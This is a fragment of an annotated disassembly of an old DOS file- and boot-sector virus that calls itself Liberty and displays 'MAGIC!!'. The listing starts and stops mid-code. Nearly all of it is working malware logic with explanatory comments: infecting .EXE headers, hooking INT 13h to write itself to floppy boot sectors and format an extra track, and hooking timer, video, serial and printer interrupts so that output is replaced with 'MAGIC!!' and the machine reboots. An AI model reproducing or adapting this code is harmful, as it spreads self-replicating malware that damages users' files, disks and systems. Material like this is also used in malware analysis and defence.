33D2 XOR DX,DX +CS:04CB 9C PUSHF +CS:04CC 2E CS: +CS:04CD FF1E8C03 CALL FAR [038C] +CS:04D1 C3 
RET +CS:04D2 B90400 MOV CX,0004 +CS:04D5 D3E8 SHR AX,CL +CS:04D7 BB6602 MOV BX,0266 +CS:04DA 8907 MOV [BX],AX +CS:04DC 40 INC AX +CS:04DD B90400 MOV CX,0004 +CS:04E0 D3E0 SHL AX,CL +CS:04E2 92 XCHG DX,AX +CS:04E3 33C9 XOR CX,CX +CS:04E5 B80042 MOV AX,4200 +CS:04E8 2E CS: +CS:04E9 8B1E0A04 MOV BX,[040A] +CS:04ED 9C PUSHF +CS:04EE 2E CS: +CS:04EF FF1E8C03 CALL FAR [038C] +CS:04F3 C3 RET +CS:04F4 B9330B MOV CX,0B33 +CS:04F7 B80040 MOV AX,4000 +CS:04FA BA1001 MOV DX,0110 +CS:04FD 2E CS: +CS:04FE 8B1E0A04 MOV BX,[040A] +CS:0502 9C PUSHF +CS:0503 2E CS: +CS:0504 FF1E8C03 CALL FAR [038C] +CS:0508 C3 RET +CS:0509 B80042 MOV AX,4200 +CS:050C 2E CS: +CS:050D 8B1E0A04 MOV BX,[040A] +CS:0511 33C9 XOR CX,CX +CS:0513 33D2 XOR DX,DX +CS:0515 9C PUSHF +CS:0516 2E CS: +CS:0517 FF1E8C03 CALL FAR [038C] +CS:051B C3 RET +CS:051C BA0A02 MOV DX,020A +CS:051F B80040 MOV AX,4000 +CS:0522 2E CS: +CS:0523 8B1E0A04 MOV BX,[040A] +CS:0527 B97800 MOV CX,0078 +CS:052A 9C PUSHF +CS:052B 2E CS: +CS:052C FF1E8C03 CALL FAR [038C] +CS:0530 C3 RET +CS:0531 B43E MOV AH,3E +CS:0533 2E CS: +CS:0534 8B1E0A04 MOV BX,[040A] +CS:0538 9C PUSHF +CS:0539 2E CS: +CS:053A FF1E8C03 CALL FAR [038C] +CS:053E C3 RET +CS:053F 33C0 XOR AX,AX +CS:0541 8ED8 MOV DS,AX +CS:0543 FA CLI +CS:0544 A14C00 MOV AX,[004C] +CS:0547 2E CS: +CS:0548 A31407 MOV [0714],AX +CS:054B A14E00 MOV AX,[004E] +CS:054E 2E CS: +CS:054F A31607 MOV [0716],AX +CS:0552 B8F906 MOV AX,06F9 +CS:0555 A34C00 MOV [004C],AX +CS:0558 8C0E4E00 MOV [004E],CS +CS:055C C3 RET +; +; Header encrypting +; +CS:055D B92D00 MOV CX,002D +CS:0560 BE0A02 MOV SI,020A +CS:0563 2E CS: +CS:0564 8B3C MOV DI,[SI] +CS:0566 D3CF ROR DI,CL +CS:0568 2E CS: +CS:0569 893C MOV [SI],DI +CS:056B 46 INC SI +CS:056C 46 INC SI +CS:056D E2F4 LOOP 0563 +CS:056F C3 RET +CS:0570 BE0A02 MOV SI,020A +CS:0573 B92D00 MOV CX,002D +CS:0576 8B3C MOV DI,[SI] +CS:0578 D3C7 ROL DI,CL +CS:057A 893C MOV [SI],DI +CS:057C 46 INC SI +CS:057D 46 INC SI +CS:057E E2F6 LOOP 0576 +CS:0580 C3 RET +; +; .EXE 
file handling +; +CS:0581 8B7F02 MOV DI,[BX+02] +CS:0584 83FFFF CMP DI,-01 ; Check infection +CS:0587 7439 JZ 05C2 +CS:0589 8B7F16 MOV DI,[BX+16] +CS:058C 83C710 ADD DI,+10 +CS:058F 893E2806 MOV [0628],DI +CS:0593 8B7F14 MOV DI,[BX+14] +CS:0596 893E2A06 MOV [062A],DI +CS:059A 8B7F0E MOV DI,[BX+0E] +CS:059D 83C710 ADD DI,+10 +CS:05A0 893E2C06 MOV [062C],DI +CS:05A4 8B7F10 MOV DI,[BX+10] +CS:05A7 893E2E06 MOV [062E],DI +CS:05AB BF1001 MOV DI,0110 +CS:05AE 897F14 MOV [BX+14],DI ; Set IP +CS:05B1 BF420D MOV DI,0D42 +CS:05B4 897F10 MOV [BX+10],DI ; Set SP +CS:05B7 2E CS: +CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch +CS:05BD E8FFFE CALL 04BF ; Move to EOF +CS:05C0 7301 JNB 05C3 +CS:05C2 C3 RET +CS:05C3 83FA0A CMP DX,+0A ; +CS:05C6 77FA JA 05C2 ; Check file size +CS:05C8 B104 MOV CL,04 +CS:05CA D3E8 SHR AX,CL +CS:05CC 40 INC AX +CS:05CD 3D0010 CMP AX,1000 +CS:05D0 7501 JNZ 05D3 +CS:05D2 42 INC DX +CS:05D3 D3E0 SHL AX,CL +CS:05D5 50 PUSH AX +CS:05D6 52 PUSH DX +CS:05D7 B91000 MOV CX,0010 +CS:05DA F7F1 DIV CX +CS:05DC BB1301 MOV BX,0113 +CS:05DF 2D1100 SUB AX,0011 +CS:05E2 8B7F08 MOV DI,[BX+08] +CS:05E5 2BC7 SUB AX,DI +CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment +CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment +CS:05ED 59 POP CX +CS:05EE 5A POP DX +CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph +CS:05F2 722F JB 0623 +CS:05F4 E8FDFE CALL 04F4 ; Write virus +CS:05F7 722A JB 0623 +CS:05F9 3BC1 CMP AX,CX +CS:05FB 7C27 JL 0624 +CS:05FD E8BFFE CALL 04BF ; Move to BOF +CS:0600 7221 JB 0623 +CS:0602 B90002 MOV CX,0200 +CS:0605 F7F1 DIV CX +CS:0607 83FA00 CMP DX,+00 +CS:060A 7401 JZ 060D +CS:060C 40 INC AX +CS:060D BB1301 MOV BX,0113 +CS:0610 894704 MOV [BX+04],AX ; Set blocks +CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark +CS:0618 E8EEFE CALL 0509 ; Move to BOF +CS:061B 7206 JB 0623 +CS:061D BA1301 MOV DX,0113 +CS:0620 E8FCFE CALL 051F ; Write header +CS:0623 C3 RET +CS:0624 E818FF CALL 053F ; Set & get vector 13h +CS:0627 C3 RET +; +; Error 
vectors +; +CS:0631 CF IRET ; Error vector 23h +CS:0632 32C0 XOR AL,AL ; +CS:0634 CF IRET ; Error vector 24h +; +; The next part is the virus's bootsector +; +CS:0635 EB01 JMP 0638 +CS:0637 90 NOP +CS:0638 33C0 XOR AX,AX +CS:063A 8ED0 MOV SS,AX +CS:063C BC007C MOV SP,7C00 +CS:063F 33C0 XOR AX,AX +CS:0641 8EC0 MOV ES,AX +CS:0643 BB1304 MOV BX,0413 ; +CS:0646 26 ES: ; +CS:0647 8B07 MOV AX,[BX] ; +CS:0649 2D0A00 SUB AX,000A ; +CS:064C B106 MOV CL,06 ; +CS:064E 26 ES: ; +CS:064F 8907 MOV [BX],AX ; Decrease memory +CS:0651 D3E0 SHL AX,CL +CS:0653 8EC0 MOV ES,AX +CS:0655 B80802 MOV AX,0208 ; +CS:0658 BB1001 MOV BX,0110 ; +CS:065B B93128 MOV CX,2831 ; +CS:065E 33D2 XOR DX,DX ; +CS:0660 CD13 INT 13 ; Read virus +CS:0662 06 PUSH ES +CS:0663 BB6806 MOV BX,0668 +CS:0666 53 PUSH BX +CS:0667 CB RETF +CS:0668 2E CS: +CS:0669 803EC8060A CMP BYTE PTR [06C8],0A +CS:066E 7446 JZ 06B6 +CS:0670 33C0 XOR AX,AX +CS:0672 8ED8 MOV DS,AX +CS:0674 2E CS: +CS:0675 FE06C806 INC BYTE PTR [06C8] +CS:0679 B80803 MOV AX,0308 +CS:067C BB1001 MOV BX,0110 +CS:067F B93128 MOV CX,2831 +CS:0682 33D2 XOR DX,DX +CS:0684 CD13 INT 13 +CS:0686 E85200 CALL 06DB ; Set & get vector 13h +CS:0689 2E CS: ; +CS:068A C606470BFF MOV BYTE PTR [0B47],FF ; +CS:068F 90 NOP ; +CS:0690 2E CS: ; +CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ; +CS:0696 90 NOP ; +CS:0697 2E CS: ; +CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off +CS:069D 90 NOP +CS:069E E82902 CALL 08CA ; Set & get vector 8h +CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch +CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h +CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h +CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h +CS:06AD E81900 CALL 06C9 ; Read original bootsector +CS:06B0 BB007C MOV BX,7C00 ; +CS:06B3 1E PUSH DS ; +CS:06B4 53 PUSH BX ; +CS:06B5 CB RETF ; Start +CS:06B6 E81000 CALL 06C9 ; Read bootsector +CS:06B9 B80103 MOV AX,0301 +CS:06BC BB007C MOV BX,7C00 +CS:06BF B90100 MOV CX,0001 +CS:06C2 33D2 XOR DX,DX +CS:06C4 CD13 INT 13 +CS:06C6 EBE5 JMP 
06AD +CS:06C9 33C0 XOR AX,AX +CS:06CB 8EC0 MOV ES,AX +CS:06CD B80102 MOV AX,0201 +CS:06D0 BB007C MOV BX,7C00 +CS:06D3 B93F28 MOV CX,283F +CS:06D6 33D2 XOR DX,DX +CS:06D8 CD13 INT 13 +CS:06DA C3 RET +CS:06DB 33C0 XOR AX,AX +CS:06DD 8ED8 MOV DS,AX +CS:06DF A14C00 MOV AX,[004C] +CS:06E2 2E CS: +CS:06E3 A31608 MOV [0816],AX +CS:06E6 A14E00 MOV AX,[004E] +CS:06E9 2E CS: +CS:06EA A31808 MOV [0818],AX +CS:06ED FA CLI +CS:06EE B8FB07 MOV AX,07FB +CS:06F1 A34C00 MOV [004C],AX +CS:06F4 8C0E4E00 MOV [004E],CS +CS:06F8 C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:06F9 9C PUSHF +CS:06FA 80FC01 CMP AH,01 +CS:06FD 7E13 JLE 0712 +CS:06FF 80FC04 CMP AH,04 +CS:0702 7D0E JGE 0712 +CS:0704 80FA80 CMP DL,80 +CS:0707 720F JB 0718 +CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h +CS:070C 07 POP ES +CS:070D 1F POP DS +CS:070E 5A POP DX +CS:070F 59 POP CX +CS:0710 5B POP BX +CS:0711 58 POP AX +CS:0712 9D POPF +CS:0713 EA00000000 JMP 0000:0000 +CS:0718 50 PUSH AX +CS:0719 53 PUSH BX +CS:071A 51 PUSH CX +CS:071B 52 PUSH DX +CS:071C 1E PUSH DS +CS:071D 06 PUSH ES +CS:071E B80102 MOV AX,0201 ; +CS:0721 0E PUSH CS ; +CS:0722 07 POP ES ; +CS:0723 0E PUSH CS ; +CS:0724 1F POP DS ; +CS:0725 BB420C MOV BX,0C42 ; +CS:0728 B90100 MOV CX,0001 ; +CS:072B 32F6 XOR DH,DH ; +CS:072D 9C PUSHF ; +CS:072E 2E CS: ; +CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector +CS:0733 72D4 JB 0709 +CS:0735 0E PUSH CS +CS:0736 1F POP DS +CS:0737 0E PUSH CS +CS:0738 07 POP ES +CS:0739 BE420C MOV SI,0C42 ; +CS:073C BF3506 MOV DI,0635 ; +CS:073F B90A00 MOV CX,000A ; +CS:0742 FC CLD ; +CS:0743 F3 REPZ ; +CS:0744 A7 CMPSW ; Check infection +CS:0745 74C2 JZ 0709 +CS:0747 BE420C MOV SI,0C42 +CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ? 
+CS:074E 744A JZ 079A +CS:0750 B0FF MOV AL,FF +CS:0752 884402 MOV [SI+02],AL +CS:0755 B80905 MOV AX,0509 ; +CS:0758 BBA607 MOV BX,07A6 ; +CS:075B B93128 MOV CX,2831 ; +CS:075E 9C PUSHF ; +CS:075F 2E CS: ; +CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40 +CS:0764 72A3 JB 0709 +CS:0766 B80103 MOV AX,0301 ; +CS:0769 BB420C MOV BX,0C42 ; +CS:076C B93F28 MOV CX,283F ; +CS:076F 9C PUSHF ; +CS:0770 2E CS: ; +CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector +CS:0775 7292 JB 0709 +CS:0777 B80103 MOV AX,0301 ; +CS:077A BB3506 MOV BX,0635 ; +CS:077D B90100 MOV CX,0001 ; +CS:0780 9C PUSHF ; +CS:0781 2E CS: ; +CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector +CS:0786 7281 JB 0709 +CS:0788 B80803 MOV AX,0308 ; +CS:078B BB1001 MOV BX,0110 ; +CS:078E B93128 MOV CX,2831 ; +CS:0791 9C PUSHF ; +CS:0792 2E CS: ; +CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus +CS:0797 E96FFF JMP 0709 +CS:079A 2E CS: ; +CS:079B C606100300 MOV BYTE PTR [0310],00 ; +CS:07A0 E83B00 CALL 07DE ; Attach ??? 
+CS:07A3 E963FF JMP 0709
+;
+; The format table is next
+;
+DS:07A0 28 00-31 02 28 00 32 02 28 00
+DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00
+DS:07C0 37 02 28 00 38 02 28 00-3F 02
+;
+; Revectoring
+;
+CS:07CA 33C0 XOR AX,AX
+CS:07CC 8ED8 MOV DS,AX
+CS:07CE FA CLI
+CS:07CF 2E CS:
+CS:07D0 A11407 MOV AX,[0714]
+CS:07D3 A34C00 MOV [004C],AX
+CS:07D6 2E CS:
+CS:07D7 A11607 MOV AX,[0716]
+CS:07DA A34E00 MOV [004E],AX
+CS:07DD C3 RET
+CS:07DE 2E CS:
+CS:07DF A11407 MOV AX,[0714]
+CS:07E2 2E CS:
+CS:07E3 A30C03 MOV [030C],AX
+CS:07E6 2E CS:
+CS:07E7 A11607 MOV AX,[0716]
+CS:07EA 2E CS:
+CS:07EB A30E03 MOV [030E],AX
+CS:07EE B8F702 MOV AX,02F7
+CS:07F1 2E CS:
+CS:07F2 A31407 MOV [0714],AX
+CS:07F5 2E CS:
+CS:07F6 8C0E1607 MOV [0716],CS
+CS:07FA C3 RET
+;
+; Boot sectors are infected via vector 13h
+;
+CS:07FB 9C PUSHF
+CS:07FC 80FC03 CMP AH,03
+CS:07FF 7213 JB 0814
+CS:0801 80FC05 CMP AH,05
+CS:0804 730E JNB 0814
+CS:0806 80FA80 CMP DL,80
+CS:0809 720F JB 081A
+CS:080B EB07 JMP 0814
+CS:080D 90 NOP
+CS:080E 07 POP ES
+CS:080F 1F POP DS
+CS:0810 5A POP DX
+CS:0811 59 POP CX
+CS:0812 5B POP BX
+CS:0813 58 POP AX
+CS:0814 9D POPF
+CS:0815 EA00000000 JMP 0000:0000
+CS:081A 50 PUSH AX
+CS:081B 53 PUSH BX
+CS:081C 51 PUSH CX
+CS:081D 52 PUSH DX
+CS:081E 1E PUSH DS
+CS:081F 06 PUSH ES
+CS:0820 2E CS:
+CS:0821 803E0C0401 CMP BYTE PTR [040C],01
+CS:0826 74E6 JZ 080E
+CS:0828 B80102 MOV AX,0201 ;
+CS:082B 0E PUSH CS ;
+CS:082C 07 POP ES ;
+CS:082D 0E PUSH CS ;
+CS:082E 1F POP DS ;
+CS:082F BB420C MOV BX,0C42 ;
+CS:0832 B90100 MOV CX,0001 ;
+CS:0835 32F6 XOR DH,DH ;
+CS:0837 9C PUSHF ;
+CS:0838 2E CS: ;
+CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector
+CS:083D 72CF JB 080E
+CS:083F 0E PUSH CS
+CS:0840 1F POP DS
+CS:0841 0E PUSH CS
+CS:0842 07 POP ES
+CS:0843 BE420C MOV SI,0C42 ;
+CS:0846 BF3506 MOV DI,0635 ;
+CS:0849 B90A00 MOV CX,000A ;
+CS:084C FC CLD ;
+CS:084D F3 REPZ ;
+CS:084E A7 CMPSW ; Check infection
+CS:084F 74BD JZ 080E
+CS:0851 B0FF MOV AL,FF
+CS:0853 884702 MOV [BX+02],AL
+CS:0856 B80905 MOV AX,0509 ;
+CS:0859 BBA607 MOV BX,07A6 ;
+CS:085C B93128 MOV CX,2831 ;
+CS:085F 9C PUSHF ;
+CS:0860 2E CS: ;
+CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28
+CS:0865 72A7 JB 080E
+CS:0867 B80103 MOV AX,0301 ;
+CS:086A BB420C MOV BX,0C42 ;
+CS:086D B93F28 MOV CX,283F ;
+CS:0870 9C PUSHF ;
+CS:0871 2E CS: ;
+CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector
+CS:0876 7296 JB 080E
+CS:0878 B80103 MOV AX,0301 ;
+CS:087B BB3506 MOV BX,0635 ;
+CS:087E B90100 MOV CX,0001 ;
+CS:0881 9C PUSHF ;
+CS:0882 2E CS: ;
+CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector
+CS:0887 7285 JB 080E
+CS:0889 B80803 MOV AX,0308 ;
+CS:088C BB1001 MOV BX,0110 ;
+CS:088F B93128 MOV CX,2831 ;
+CS:0892 9C PUSHF ;
+CS:0893 2E CS: ;
+CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector
+CS:0898 E973FF JMP 080E
+CS:089B 9C PUSHF
+CS:089C 50 PUSH AX
+CS:089D 1E PUSH DS
+CS:089E 33C0 XOR AX,AX
+CS:08A0 8ED8 MOV DS,AX
+CS:08A2 833E860000 CMP WORD PTR [0086],+00 ;
+CS:08A7 750F JNZ 08B8 ; Check if DOS is installed
+CS:08A9 833E840000 CMP WORD PTR [0084],+00 ;
+CS:08AE 7508 JNZ 08B8
+CS:08B0 1F POP DS
+CS:08B1 58 POP AX
+CS:08B2 9D POPF
+CS:08B3 EA00000000 JMP 0000:0000
+CS:08B8 06 PUSH ES
+CS:08B9 0E PUSH CS
+CS:08BA 07 POP ES
+CS:08BB E8C3F9 CALL 0281 ; Get vector 21h
+CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h
+CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h
+CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag
+CS:08C7 07 POP ES
+CS:08C8 EBE6 JMP 08B0
+;
+; Revectoring
+;
+CS:08CA A12000 MOV AX,[0020]
+CS:08CD 2E CS:
+CS:08CE A3B408 MOV [08B4],AX
+CS:08D1 A12200 MOV AX,[0022]
+CS:08D4 2E CS:
+CS:08D5 A3B608 MOV [08B6],AX
+CS:08D8 B89B08 MOV AX,089B
+CS:08DB FA CLI
+CS:08DC A32000 MOV [0020],AX
+CS:08DF 8C0E2200 MOV [0022],CS
+CS:08E3 C3 RET
+CS:08E4 33C0 XOR AX,AX
+CS:08E6 8ED8 MOV DS,AX
+CS:08E8 FA CLI
+CS:08E9 2E CS:
+CS:08EA A1B408 MOV AX,[08B4]
+CS:08ED A32000 MOV [0020],AX
+CS:08F0 2E CS:
+CS:08F1 A1B608 MOV AX,[08B6]
+CS:08F4 A32200 MOV [0022],AX
+CS:08F7 C3 RET
+CS:08F8 A17000 MOV AX,[0070]
+CS:08FB 2E CS:
+CS:08FC A3900A MOV [0A90],AX
+CS:08FF A17200 MOV AX,[0072]
+CS:0902 2E CS:
+CS:0903 A3920A MOV [0A92],AX
+CS:0906 B8580A MOV AX,0A58
+CS:0909 FA CLI
+CS:090A A37000 MOV [0070],AX
+CS:090D 8C0E7200 MOV [0072],CS
+CS:0911 C3 RET
+;
+; The next routine displays 'M A G I C ! !' on the screen for a second
+;
+CS:0912 50 PUSH AX
+CS:0913 53 PUSH BX
+CS:0914 51 PUSH CX
+CS:0915 52 PUSH DX
+CS:0916 56 PUSH SI
+CS:0917 57 PUSH DI
+CS:0918 1E PUSH DS
+CS:0919 06 PUSH ES
+CS:091A 9C PUSHF
+CS:091B BB00B8 MOV BX,B800 ;
+CS:091E 8EDB MOV DS,BX ;
+CS:0920 0E PUSH CS ;
+CS:0921 07 POP ES ;
+CS:0922 33F6 XOR SI,SI ;
+CS:0924 BF6809 MOV DI,0968 ;
+CS:0927 B9A000 MOV CX,00A0 ;
+CS:092A F3 REPZ ;
+CS:092B A4 MOVSB ; Save screen
+CS:092C BB00B8 MOV BX,B800 ;
+CS:092F 8EC3 MOV ES,BX ;
+CS:0931 0E PUSH CS ;
+CS:0932 1F POP DS ;
+CS:0933 33FF XOR DI,DI ;
+CS:0935 BB080A MOV BX,0A08 ;
+CS:0938 B95000 MOV CX,0050 ;
+CS:093B B6CE MOV DH,CE ;
+CS:093D 8A17 MOV DL,[BX] ;
+CS:093F 80EA03 SUB DL,03 ;
+CS:0942 26 ES: ;
+CS:0943 8915 MOV [DI],DX ;
+CS:0945 47 INC DI ;
+CS:0946 47 INC DI ;
+CS:0947 43 INC BX ;
+CS:0948 E2F3 LOOP 093D ; Put text on screen
+CS:094A E2FE LOOP 094A ; Wait
+CS:094C BB00B8 MOV BX,B800 ;
+CS:094F 8EC3 MOV ES,BX ;
+CS:0951 0E PUSH CS ;
+CS:0952 1F POP DS ;
+CS:0953 33FF XOR DI,DI ;
+CS:0955 BE6809 MOV SI,0968 ;
+CS:0958 B9A000 MOV CX,00A0 ;
+CS:095B F3 REPZ ;
+CS:095C A4 MOVSB ; Restore screen
+CS:095D 9D POPF
+CS:095E 07 POP ES
+CS:095F 1F POP DS
+CS:0960 5F POP DI
+CS:0961 5E POP SI
+CS:0962 5A POP DX
+CS:0963 59 POP CX
+CS:0964 5B POP BX
+CS:0965 58 POP AX
+CS:0966 C3 RET
+;
+; A temporary screen buffer
+;
+DS:0960 4D 41 47 49 43 4D 41 47
+DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49
+DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43
+DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D
+DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41
+DS:09B0 47 49 43 4D 41 47 49 43-4D 41 47 49 43 4D 41 47
+DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49
+DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43
+DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D
+DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41
+DS:0A00 47 49 43 4D 41 47 49 43
+;
+; The encrypted text 'M A G I C ! !'
+;
+DS:0A00 23 23 23 23 23 23 23 23
+DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23
+DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23
+DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23
+DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23
+DS:0A50 23 23 23 23 23 23 23 23
+;
+; The next routine is the timer routine. It activates all the gadgets.
+;
+CS:0A58 9C PUSHF
+CS:0A59 50 PUSH AX
+CS:0A5A 1E PUSH DS
+CS:0A5B 2E CS:
+CS:0A5C FF06940A INC WORD PTR [0A94]
+CS:0A60 2E CS:
+CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ?
+CS:0A66 7433 JZ 0A9B
+CS:0A68 2E CS:
+CS:0A69 A1980A MOV AX,[0A98]
+CS:0A6C 2E CS:
+CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ?
+CS:0A71 7430 JZ 0AA3
+CS:0A73 7217 JB 0A8C
+CS:0A75 050002 ADD AX,0200
+CS:0A78 2E CS:
+CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ?
+CS:0A7D 7446 JZ 0AC5
+CS:0A7F 770B JA 0A8C
+CS:0A81 2E CS:
+CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ?
+CS:0A87 7503 JNZ 0A8C
+CS:0A89 E886FE CALL 0912 ; Mess up screen
+CS:0A8C 1F POP DS
+CS:0A8D 58 POP AX
+CS:0A8E 9D POPF
+CS:0A8F EA00000000 JMP 0000:0000 ; Continue
+CS:0A9B B8FFFF MOV AX,FFFF
+CS:0A9E 50 PUSH AX
+CS:0A9F 33C0 XOR AX,AX
+CS:0AA1 50 PUSH AX
+CS:0AA2 CB RETF
+CS:0AA3 2E CS:
+CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150
+CS:0AAA 33C0 XOR AX,AX
+CS:0AAC 8ED8 MOV DS,AX
+CS:0AAE 2E CS:
+CS:0AAF C606470B00 MOV BYTE PTR [0B47],00
+CS:0AB4 90 NOP
+CS:0AB5 2E CS:
+CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00
+CS:0ABB 90 NOP
+CS:0ABC 2E CS:
+CS:0ABD C606080C00 MOV BYTE PTR [0C08],00
+CS:0AC2 90 NOP
+CS:0AC3 EBC7 JMP 0A8C
+CS:0AC5 2E CS:
+CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF
+CS:0ACB 90 NOP
+CS:0ACC 2E CS:
+CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF
+CS:0AD2 90 NOP
+CS:0AD3 2E CS:
+CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF
+CS:0AD9 90 NOP
+CS:0ADA 2E CS:
+CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000
+CS:0AE1 2E CS:
+CS:0AE2 FF06960A INC WORD PTR [0A96]
+CS:0AE6 EBA4 JMP 0A8C
+CS:0AE8 A14000 MOV AX,[0040]
+CS:0AEB 2E CS:
+CS:0AEC A3430B MOV [0B43],AX
+CS:0AEF A14200 MOV AX,[0042]
+CS:0AF2 2E CS:
+CS:0AF3 A3450B MOV [0B45],AX
+CS:0AF6 B8360B MOV AX,0B36
+CS:0AF9 FA CLI
+CS:0AFA A34000 MOV [0040],AX
+CS:0AFD 8C0E4200 MOV [0042],CS
+CS:0B01 C3 RET
+CS:0B02 FA CLI
+CS:0B03 A15000 MOV AX,[0050]
+CS:0B06 2E CS:
+CS:0B07 A3910B MOV [0B91],AX
+CS:0B0A A15200 MOV AX,[0052]
+CS:0B0D 2E CS:
+CS:0B0E A3930B MOV [0B93],AX
+CS:0B11 B8840B MOV AX,0B84
+CS:0B14 A35000 MOV [0050],AX
+CS:0B17 8C0E5200 MOV [0052],CS
+CS:0B1B C3 RET
+CS:0B1C FA CLI
+CS:0B1D A15C00 MOV AX,[005C]
+CS:0B20 2E CS:
+CS:0B21 A3040C MOV [0C04],AX
+CS:0B24 A15E00 MOV AX,[005E]
+CS:0B27 2E CS:
+CS:0B28 A3060C MOV [0C06],AX
+CS:0B2B B8FC0B MOV AX,0BFC
+CS:0B2E A35C00 MOV [005C],AX
+CS:0B31 8C0E5E00 MOV [005E],CS
+CS:0B35 C3 RET
+;
+; Now the gadgets' routines. When activated, only the word MAGIC!! will be
+; sent to screen, port, and printer.
+;
+CS:0B36 9C PUSHF ; Screen
+CS:0B37 80FC09 CMP AH,09
+CS:0B3A 740F JZ 0B4B
+CS:0B3C 80FC0A CMP AH,0A
+CS:0B3F 740A JZ 0B4B
+CS:0B41 9D POPF
+CS:0B42 EA00000000 JMP 0000:0000
+CS:0B4B 2E CS:
+CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF
+CS:0B51 74EE JZ 0B41
+CS:0B53 53 PUSH BX
+CS:0B54 56 PUSH SI
+CS:0B55 50 PUSH AX
+CS:0B56 33DB XOR BX,BX
+CS:0B58 2E CS:
+CS:0B59 833E480B07 CMP WORD PTR [0B48],+07
+CS:0B5E 7507 JNZ 0B67
+CS:0B60 2E CS:
+CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000
+CS:0B67 2E CS:
+CS:0B68 8B1E480B MOV BX,[0B48]
+CS:0B6C 2E CS:
+CS:0B6D 8B3E480B MOV DI,[0B48]
+CS:0B71 47 INC DI
+CS:0B72 2E CS:
+CS:0B73 893E480B MOV [0B48],DI
+CS:0B77 BE3B0C MOV SI,0C3B
+CS:0B7A 58 POP AX
+CS:0B7B 2E CS:
+CS:0B7C 8A00 MOV AL,[BX+SI]
+CS:0B7E FEC0 INC AL
+CS:0B80 5E POP SI
+CS:0B81 5B POP BX
+CS:0B82 EBBD JMP 0B41
+CS:0B84 9C PUSHF ; Port
+CS:0B85 80FC01 CMP AH,01
+CS:0B88 740D JZ 0B97
+CS:0B8A 80FC02 CMP AH,02
+CS:0B8D 7436 JZ 0BC5
+CS:0B8F 9D POPF
+CS:0B90 EA00000000 JMP 0000:0000
+CS:0B97 2E CS:
+CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF
+CS:0B9D 74F0 JZ 0B8F
+CS:0B9F 53 PUSH BX
+CS:0BA0 56 PUSH SI
+CS:0BA1 33DB XOR BX,BX
+CS:0BA3 2E CS:
+CS:0BA4 8A1E960B MOV BL,[0B96]
+CS:0BA8 BE3B0C MOV SI,0C3B
+CS:0BAB 2E CS:
+CS:0BAC 8A00 MOV AL,[BX+SI]
+CS:0BAE 2E CS:
+CS:0BAF FE06960B INC BYTE PTR [0B96]
+CS:0BB3 2E CS:
+CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07
+CS:0BB9 7506 JNZ 0BC1
+CS:0BBB 2E CS:
+CS:0BBC C606960B00 MOV BYTE PTR [0B96],00
+CS:0BC1 5E POP SI
+CS:0BC2 5B POP BX
+CS:0BC3 EBCA JMP 0B8F
+CS:0BC5 2E CS:
+CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF
+CS:0BCB 74C2 JZ 0B8F
+CS:0BCD 2E CS:
+CS:0BCE FF1E910B CALL FAR [0B91]
+CS:0BD2 80FC00 CMP AH,00
+CS:0BD5 7F24 JG 0BFB
+CS:0BD7 53 PUSH BX
+CS:0BD8 56 PUSH SI
+CS:0BD9 33DB XOR BX,BX
+CS:0BDB 2E CS:
+CS:0BDC 8A1E960B MOV BL,[0B96]
+CS:0BE0 BE3B0C MOV SI,0C3B
+CS:0BE3 2E CS:
